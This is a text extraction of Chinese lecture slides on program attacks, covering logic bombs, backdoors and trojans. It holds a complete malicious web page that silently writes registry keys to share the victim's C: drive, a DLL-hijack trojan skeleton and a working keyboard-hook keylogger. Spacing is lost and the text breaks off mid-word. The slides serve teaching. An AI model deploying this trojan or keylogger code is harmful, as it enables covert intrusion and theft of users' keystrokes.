網(wǎng)絡(luò)安全6-程序攻擊

第5章緩沖區(qū)溢出攻擊回顧緩沖區(qū)溢出攻擊的基本原理、方法緩沖區(qū)溢出程序的原理及要素攻擊UNIX攻擊WINDOWS1第一頁，共35頁。第6章程序攻擊本章列出了常用的程序攻擊方法，介紹了邏輯炸彈、后門、病毒及特洛伊木馬等的概念和特點，并用實例說明工作原理，提供和分析了部分代碼以便更深入地學習和了解技術(shù)原理。2第二頁，共35頁。第6章程序攻擊6.1邏輯炸彈攻擊6.2植入后門6.3病毒攻擊6.4特洛伊木馬攻擊6.5其它程序攻擊3第三頁，共35頁。邏輯炸彈攻擊定義一種隱藏于計算機系統(tǒng)中以某種方式觸發(fā)后對計算機系統(tǒng)硬件、軟件或數(shù)據(jù)進行惡意破壞的程序代碼觸發(fā)方式時間觸發(fā)、特定操作觸發(fā)、滿足某一條件的觸發(fā)等第6章第1節(jié)4第四頁，共35頁。邏輯炸彈攻擊特征隱蔽性：邏輯炸彈一般都比較短小，容易附著在系統(tǒng)或文件上而不容易察覺，也可能被惡意隱藏在一些常用工具軟件代碼中攻擊性：邏輯炸彈都具有攻擊性，一旦被激發(fā)，或是干擾屏幕顯示，或降低電腦運行速度，或是刪除程序，破壞數(shù)據(jù)邏輯炸彈沒有“傳染性”第6章第1節(jié)5第五頁，共35頁。植入后門定義后門是計算機入侵者攻擊網(wǎng)上其它計算機成功后為方便下次進入這臺被攻擊計算機而采取的一些欺騙手段和程序目的再次進入、不被發(fā)現(xiàn)健壯性第6章第2節(jié)6第六頁，共35頁。植入后門攻擊方法獲取盡可能多的用戶口令，并不會被管理員察覺或查封更改配置例如：rhosts替換程序（包括源代碼，函數(shù)庫，內(nèi)核）要點：時間、校驗和開設(shè)新的服務(wù)，定時開啟服務(wù)第6章第2節(jié)7第七頁，共35頁。植入后門隱藏代碼：壞扇區(qū)，Boot通訊：TCP，UDP和ICMPShell后門：TCP/UDP/ICMP第6章第2節(jié)8第八頁，共35頁。植入后門隱藏執(zhí)行DLLRundll32.exeDllcache動態(tài)嵌入掛接API，全局鉤子（HOOK），遠程線程第6章第2節(jié)9第九頁，共35頁。植入后門Unix后門netcatncpbshVetescan后門軟件

第6章第2節(jié)10第十頁，共35頁。病毒攻擊詳見第13章網(wǎng)絡(luò)病毒防治第6章第3節(jié)11第十一頁，共35頁。特洛伊木馬攻擊定義特洛伊木馬，簡稱木馬，英文名為Trojanhorse計算機領(lǐng)域的“特洛伊木馬(Trojan)”，是指附著在應(yīng)用程序中或者單獨存在的一些惡意程序，它可以利用網(wǎng)絡(luò)遠程響應(yīng)網(wǎng)絡(luò)另一端的控制程序的控制命令，實現(xiàn)對感染木馬程序的計算機的控制，或者竊取感染木馬程序的計算機上的機密資料。第6章第4節(jié)12第十二頁，共35頁。特洛伊木馬攻擊工作原理木馬程序一般利用TCP/IP協(xié)議，采用C/S結(jié)構(gòu)，分為客戶端和服務(wù)器端兩個部分服務(wù)器端程序運行于被攻擊的計算機上，而客戶端程序在控制者的計算機上運行客戶端程序可以同時向很多服務(wù)端程序發(fā)送命令以控制這些計算機。客戶端程序一般提供友好的操作界面，以便于用戶的操作，其功能可能很多第6章第4節(jié)13第十三頁，共35頁。特洛伊木馬攻擊功能分類遠程訪問型木馬密碼發(fā)送型木馬鍵盤記錄型木馬毀壞型木馬FTP型木馬第6章第4節(jié)14第十四頁，共35頁。特洛伊木馬攻擊通訊分類主動型木馬反彈型木馬嵌入式木馬第6章第4節(jié)15第十五頁，共35頁。特洛伊木馬攻擊冰河文件瀏覽器屏幕監(jiān)視鍵盤鼠標控制其它控制支持配置glacier第6章第4節(jié)16第十六頁，共35頁。特洛伊木馬攻擊反彈型木馬它利用防火墻對內(nèi)部發(fā)起的連接請求無條件信任的特點，假冒是系統(tǒng)的合法網(wǎng)絡(luò)請求與木馬的客戶端建立連接，從而達到對被攻擊計算機控制的目的第6章第4節(jié)17第十七頁，共35頁。特洛伊木馬攻擊網(wǎng)絡(luò)神偷遠程文件訪問，而不是遠程控制反彈端口HTTP隧道服務(wù)器端上線通知功能通訊加密第6章第4節(jié)18第十八頁，共35頁。特洛伊木馬攻擊嵌入式木馬嵌入網(wǎng)頁的共享式木馬<html> <head> <title>共享木馬</title> </head> <script> functionkillErrors() {returntrue;} </script>第6章第4節(jié)19第十九頁，共35頁。 <scriptlanguage=JScript> document.write("<APPLETHEIGHT=0WIDTH=0code=com.ms.activeX.ActiveXComponent></APPLET>");functionmmain(){try{ aa=document.applets[0]; aa.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0b}"); aa.createInstance(); commandsh=aa.GetObject();{commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Flags",302,"REG_DWORD");commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Type",0,"REG_DWORD"); commandsh.RegWrite("HKLM\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Network\\LanMan\\C$\\Path","C:\\");第6章第4節(jié)20第二十頁，共35頁。 } } catch(e){} } functionstart(){setTimeOut("mmain()",1000);} start(); </script> <bodybgcolor=#FFFFFFtopmargin=0leftmargin=0> <p>你好。。。。。。。</p><p>全世界最好的網(wǎng)頁</p> </body></html>第6章第4節(jié)21第二十一頁，共35頁。特洛伊木馬攻擊嵌入式木馬DLL木馬替換系統(tǒng)原有DLL，模仿原有功能，并加入后門#include<windows.h>#include<stdio.h>#include<winsock.h>voidmuma_thread(){ //生成木馬的服務(wù)器線程 ………}//…..必須輸出與原wsock32.dll庫同樣的函數(shù)第6章第4節(jié)22第二十二頁，共35頁。BOOLWINAPIDllMain(HANDLEhInst,ULONGulReasonForCall,LPVOIDlpReserved){//裝載原動態(tài)庫if(i==NULL){ i=LoadLibrary(wsock32.dle);}else return1;if(i!=NULL){//取得與原同名函數(shù)地址a=GetProcAddress(I,”send”);send1=(int(_stdcall*)(SOCKET,constchar*,int,int))a;a=GetProcAddress(I,”recv”);recv1=(int(_stdcall*)(SOCKET,constchar*,int,int))a;}第6章第4節(jié)23第二十三頁，共35頁。else return0;………………替換原來的所有函數(shù)導出，以確保程序運行正常。}intPASCALFARsend(SOCKETs,constchar*buf,intlen,intflags){ ……完成send函數(shù)的功能}intPASCALFARrecv(SOCKETs,charFAR*buf,intlen,intflags){ ……完成recv函數(shù)的功能}第6章第4節(jié)24第二十四頁，共35頁。特洛伊木馬攻擊木馬的實現(xiàn)技術(shù)自動啟動技術(shù)隱藏技術(shù)遠程監(jiān)控技術(shù)

第6章第4節(jié)25第二十五頁，共35頁。特洛伊木馬攻擊木馬的實現(xiàn)技術(shù)自動啟動技術(shù)啟動組、win.ini、system.ini、注冊表第6章第4節(jié)26第二十六頁，共35頁。特洛伊木馬攻擊木馬的實現(xiàn)技術(shù)隱藏技術(shù)任務(wù)欄任務(wù)管理器服務(wù)管理器DLL替換遠程線程第6章第4節(jié)27第二十七頁，共35頁。特洛伊木馬攻擊木馬的實現(xiàn)技術(shù)遠程監(jiān)控技術(shù)對對方計算機的監(jiān)視包括對對方主機的鼠標、鍵盤以及屏幕顯示甚至網(wǎng)絡(luò)通訊流量流向等的監(jiān)視，也包括對對方計算機系統(tǒng)信息（包括磁盤信息、操作系統(tǒng)信息及硬件信息）的搜集

遠程控制則是攻擊者控制目標機按照自己的意愿在被攻擊計算機上運行程序或者關(guān)閉對方的功能，包括控制對方的鼠標、鍵盤、操作系統(tǒng)，在對方計算機上啟動服務(wù)，或者關(guān)閉對方計算機等第6章第4節(jié)28第二十八頁，共35頁。特洛伊木馬攻擊鍵盤型木馬extern"C"BOOL_declspec(dllexport)__stdcallinstallhook(){ FILE*f1=NULL; f1=fopen("e:\\hook.txt","w"); fclose(f1); hkb=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hins,0); returnTRUE;}第6章第4節(jié)29第二十九頁，共35頁。HHOOK hkb;LRESULT__declspec(dllexport)__stdcallCALLBACKKeyboardProc(intnCode,WPARAMwParam,LPARAMlParam){ charch; if(((DWORD)lParam&0x40000000)&&(HC_ACTION==nCode)) { if((wParam==VK_SPACE)||(wParam==VK_RETURN)||(wParam>=0x2f)&&(wParam<=0x100)) { FILE*f1; f1=fopen("e:\\hook.txt","a+");//打開文件 if(wParam==VK_RETURN) { ch='\n'; fwrite(&ch,1,1,f1);//將鍵盤按鍵的字母寫入文件 }第6章第4節(jié)30第三十頁，共35頁。 else { BYTEks[256]; GetKeyboardState(ks); WORDw; UINTscan; scan=0; ToAscii(wParam,scan,ks,&w,0); ch=char(w); fwrite(&ch,1,1,f1);//將鍵盤按鍵的字母寫入文件 } fclose(f1); } } LRESULTRetVal=CallNextHookEx(hkb,nCode,wParam,lParam); returnRetVal;}第6章第4節(jié)31第三十一頁，共35頁。BOOL_declspec(dllexport)UnHook(){ BOOLunhooked=UnhookWindowsHookEx(hkb); return unhooked;}//*.h中聲明如下LRESULT__declspec(dllexport)__stdcallCALLBACKKeyboardProc( intnCode,WPARAMwParam,LPARAMlParam);extern"C"BOOL_declspec(dllexport)__stdcallinstallhook();第6章第4節(jié)32第三十二頁，共35頁。其它程序攻擊郵件炸彈與垃圾郵件

常用攻擊工具upyours4、KaBoom3、HakTek、Avalanche等

IE攻